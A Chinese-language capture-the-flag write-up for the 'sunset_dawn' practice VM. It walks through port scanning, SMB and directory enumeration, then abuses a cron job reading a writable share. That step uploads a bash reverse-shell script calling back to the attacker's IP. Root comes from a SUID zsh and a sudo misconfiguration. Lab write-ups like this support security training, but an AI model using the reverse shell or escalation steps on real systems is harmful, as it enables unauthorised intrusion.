sunset_dawn 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-12 13:21 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00035s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.46 seconds

开放了 80,139,445,3306 端口

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap -sT -sV -sC -O -p80,139,445,3306 192.168.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-12 13:24 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00031s latency).

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn\'t have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open              Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 16
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolNew, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsTransactions, InteractiveClient, DontAllowDatabaseTableColumn, FoundRows, IgnoreSigpipes, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: &@QV;b_5*ouz)ZgzO[\=
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DAWN

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2023-08-12T13:24:44-04:00
|_clock-skew: mean: 1h19m57s, deviation: 2h18m33s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-08-12T17:24:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds

Debian 操作系统，Apache httpd 2.4.38

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.134              
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 11:11 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00032s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds

UDP 端口无收获

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap --script=vuln -p80,139,445,3306 192.168.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 11:17 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.134
Host is up (0.00031s latency).

PORT     STATE SERVICE
80/tcp   open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-enum: 
|_  /logs/: Logs
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 71.14 seconds

80 端口发现 logs 目录

ftp 和 MySQL 渗透

尝试一下 ftp 匿名登陆和 MySQL 无密码登录

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ ftp 192.1.1.142           
Connected to 192.1.1.142.
220 (vsFTPd 3.0.3)
Name (192.1.1.142:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ mysql -u root -h 192.168.56.134 -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.106' (using password: NO)

smb 渗透

尝试登录 smb

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo smbmap -H 192.168.56.134      
[sudo] password for kali: 
[+] IP: 192.168.56.134:445      Name: 192.168.56.134                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        ITDEPT                                                  READ ONLY       PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ smbclient //192.168.56.134/ITDEPT  
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Fri Aug  2 23:21:39 2019

                7158264 blocks of size 1024. 0 blocks available
smb: \> pwd
Current directory is \\192.168.56.134\ITDEPT\

可以登录但是空空如也，尝试了一下，可以上传文件，没有进一步的信息可以利用，先去网站看看

目录爆破

查看 web 界面的同时开始目录爆破

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo dirsearch -u http://192.168.56.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545

Output File: /root/.dirsearch/reports/192.168.56.134/_23-08-12_14-35-08.txt

Error Log: /root/.dirsearch/logs/errors-23-08-12_14-35-08.log

Target: http://192.168.56.134/

[14:35:08] Starting: 
[14:35:12] 301 -  315B  - /logs  ->  http://192.168.56.134/logs/           
[14:35:25] 301 -  315B  - /cctv  ->  http://192.168.56.134/cctv/           
[14:38:41] 403 -  302B  - /server-status

尝试访问 logs 和 cctv 目录，cctv 无权限，logs 目录可以看到文件列表

再一次对 cctv 目录进行爆破，防止漏信息

全是 404 和 403，看来突破口不在这

日志文件泄露

回看 logs 目录，发现前几个文件都没有权限范围，management.log 打开是一个日志信息，通过观察发现文件应该是由 pspy64 生成的。但却没有进一步的信息，我在这里遇到了很大的问题，日志文件中没有什么有价值的信息

刚开始我以为是乱码问题导致的，换了几种编码方式都没有预想中的效果，在这里又尝试了对 ftp 和 MySQL 进行了密码爆破，但都失败了，80 端口界面中没有特别有价值的信息

这里真的快山穷水尽了，卡了一整天，没办法选择了看 WP，而别人笔记里的 management.log 是有提示信息的，经过再一次排查，我发现我的日志信息里没有更新进一步的信息，而正常打靶的笔记里，这个文件是会定时更新的。尝试先恢复快照再重启，重新打开日志目录，发现 management.log 文件大概 3 min 刷新一次，这才是正常的靶机环境……

定时任务Getshell

有点无语，接着打吧，后续的过程就简单很多了，首先看看日志文件里的信息

应当是一个定时任务，而其中的目录信息和我们刚才 smb 共享的目录名是同一个，这就比较有意思了

我们可以尝试通过 smb 上传同名的恶意文件到 ITDEPT 目录中，然后等待反弹 shell

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ cat web-control         
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.68.156.106/443 0>&1

smb: \> put web-control 
putting file web-control as \web-control (3.1 kb/s) (average 3.7 kb/s)

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.134] 40794
sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux dawn 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:84:97:e0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.134/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 443sec preferred_lft 443sec
    inet6 fe80::a00:27ff:fe84:97e0/64 scope link 
       valid_lft forever preferred_lft forever
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@dawn:~$

基础的信息收集

www-data@dawn:~/html$ ls -alih
ls -alih
total 24K
16513 drwxr-xr-x 4 root root 4.0K Aug  3  2019 .
16512 drwxr-xr-x 3 root root 4.0K Aug  1  2019 ..
11120 drw------- 2 root root 4.0K Aug  1  2019 cctv
11145 -rw-r--r-- 1 root root  791 Aug  3  2019 index.html
 9264 -rw-r--r-- 1 root root 1.0K Aug  3  2019 .index.html.swp
16523 drwxr-xr-x 2 root root 4.0K Aug  1  2019 logs
www-data@dawn:~/html$ cd cctv   
cd cctv
bash: cd: cctv: Permission denied
www-data@dawn:~/html$ cat .index.html.swp
cat .index.html.swp
b0nano 3.2rootdawn/var/www/html/index.htmlU

www-data@dawn:/home/dawn$ sudo -l
sudo -l
Matching Defaults entries for www-data on dawn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/sudo

提权

好家伙竟然可以无密码以 root 权限运行 sudo，直接 sudo su 试试？

www-data@dawn:/home/dawn$ /usr/bin/sudo su
/usr/bin/sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts

要输密码？？我不理解

接下来就这个命令尝试了各种方法，但是均需要密码，还尝试了用网站根目录下隐藏的文件中的内容作为密码，也都失败了

www-data@dawn:/home/dawn$ sudo nano
sudo nano

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 

家人们还是看看远方的定时任务和 SUID 吧

www-data@dawn:/home/ganimedes$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@dawn:/home/ganimedes$ find / -type f -perm -04000 2>/dev/null
find / -type f -perm -04000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn

好家伙，zsh 也是 SUID，这么简单就提权了吗

www-data@dawn:/home/ganimedes$ /usr/bin/zsh -p
/usr/bin/zsh -p
dawn# whoami                                                                   
whoami
root
dawn# id                                                                       
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# ip a                                                                     
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:84:97:e0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.134/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 506sec preferred_lft 506sec
    inet6 fe80::a00:27ff:fe84:97e0/64 scope link 
       valid_lft forever preferred_lft forever
dawn# uname -a                                                                 
uname -a
Linux dawn 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 GNU/Linu

还真是，竟然这么快就结束了，确实是 easy 难度的靶机，不过定时任务没起来导致日志文件没信息可难受死我了。收尾 flag。

dawn# cd /root                                                                 
cd /root
dawn# ls                                                                       
ls
flag.txt  pspy64
dawn# cat flag.txt                                                             
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!

flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}

补充

关于 sudo 如何切换用户不需要密码

$ sudo sudo su
whoami
root